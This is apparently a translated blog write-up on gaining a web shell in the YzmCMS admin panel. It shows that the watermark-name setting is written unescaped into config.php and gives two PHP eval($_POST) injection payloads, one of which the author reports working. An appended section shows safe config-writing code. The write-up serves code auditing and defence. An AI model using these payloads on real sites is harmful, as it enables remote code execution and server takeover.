YzmCMS Backend Getshell

Source: Internet
Author: User

Without further ado, straight to the topic. First, in function.php you can see that this method writes to /config/config.php by traversing an array. Opening config.php shows:

<?php
return array(

    //system configuration
    'site_theme' => 'default', //site default theme directory
    'url_html_suffix' => '.html', //URL pseudo-static suffix

    //database configuration
    'db_type' => 'mysqli', //database link extension "temporarily supports mysql and mysqli"
    'db_host' => '127.0.0.1', //server address
    'db_name' => 'yzmcms', //database name
    'db_user' => 'root', //user name
    'db_pwd' => 'root', //password
    'db_port' => 3306, //port
    'db_prefix' => 'yzm_', //database table prefix

    //routing configuration
    'route' => array('m' => 'index', 'c' => 'index', 'a' => 'init'), //default load configuration: "m" is the model, "c" the controller, "a" the event

    //cookie configuration
    'cookie_domain' => '', //cookie scope
    'cookie_path' => '/', //cookie path
    'cookie_ttl' => 0, //cookie lifetime, 0 means it lasts for the browser process
    'cookie_pre' => 'yzmphp_', //cookie prefix; when installing several systems under the same domain name, change the cookie prefix
    'cookie_secure' => false, //whether to transmit the cookie only over a secure HTTPS connection

    //system language
    'language' => 'zh_cn', //"supports Simplified Chinese zh_cn and American English en_us"

    //attachment-related configuration
    'upload_file' => 'uploads', //upload file directory, must not end with a slash ("/")
    'watermark_enable' => '1', //whether to enable the picture watermark
    'watermark_name' => 'mank.png', //watermark name
    'watermark_position' => '9', //watermark position

);
?>

The file uses return array() to define all of the configuration as a single array.

Line 33, the watermark name, can be controlled from the backend:

System Management > System Settings > Additional settings

You have probably thought of it by this point: close the single quote in the watermark name and insert a one-line shell into config.php, such as:

',);?><?php eval($_POST['a'])?>

The quote was closed and the code was inserted successfully, but then the problem came: the shell would not connect, and at the time I was confused. Maybe the program had some protective measures, so I confidently wrote in a few one-line shells for getting past the "dog" that I had treasured for years, and it still would not connect. My mood at that point: this is just not scientific.

I hurried to ask master Fly and learned that it is because of the return: the file has already returned before the inserted code is reached. After discussing it with a few friends, we came up with the idea of closing the single quote and adding an array element instead:

', 'test' => "${@eval($_POST['a'])};", 'a' => '

Successful connection

I will publish more code-audit articles later. You do not know until you try auditing; once I tried, I found out how much of a beginner I really am, alas.
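The root cause above is that a value from the settings form is pasted between quotes in a PHP file that is later included. As an added example (not YzmCMS code, and not from the original post), here is one way to write such a config file safely; the function save_settings(), the CONFIG_RULES patterns and the sample values are assumptions made for illustration.

```php
<?php
// Added example, not YzmCMS code; save_settings() and CONFIG_RULES are hypothetical.
// Assumed allowlist: one anchored pattern per setting the admin form may change.
const CONFIG_RULES = [
    'watermark_name'     => '/\A[A-Za-z0-9_-]{1,64}\.(png|gif|jpe?g)\z/',
    'watermark_enable'   => '/\A[01]\z/',
    'watermark_position' => '/\A[1-9]\z/',
];

function save_settings(string $file, array $input): void
{
    $config = include $file;   // the file returns the settings array
    foreach ($input as $key => $value) {
        $rule = CONFIG_RULES[$key] ?? null;
        if ($rule === null || !is_string($value) || !preg_match($rule, $value)) {
            throw new InvalidArgumentException("rejected setting: $key");
        }
        $config[$key] = $value;
    }
    // var_export() emits a valid PHP literal: quotes and backslashes are escaped,
    // and strings are single-quoted, so "${...}" is never interpolated on include.
    $code = "<?php\nreturn " . var_export($config, true) . ";\n";
    $tmp = $file . '.tmp';
    file_put_contents($tmp, $code, LOCK_EX);
    rename($tmp, $file);       // replace the old file in one step
}

// Demo on a constructed config file in the temp directory.
$file = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($file, "<?php\nreturn array('watermark_name' => 'old.png');\n");

save_settings($file, ['watermark_name' => 'logo.png']);
var_dump((include $file)['watermark_name']);

try {
    // Constructed value containing a quote, the bug class described above.
    save_settings($file, ['watermark_name' => "x.png', 'k' => 'v"]);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
// Second layer: even unvalidated, the same string is serialized as one literal.
echo var_export("x.png', 'k' => 'v", true), "\n";
unlink($file);
```

Keeping config.php non-writable by the web server user, and storing form-editable settings in the database rather than in an included PHP file, removes this class of bug altogether.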
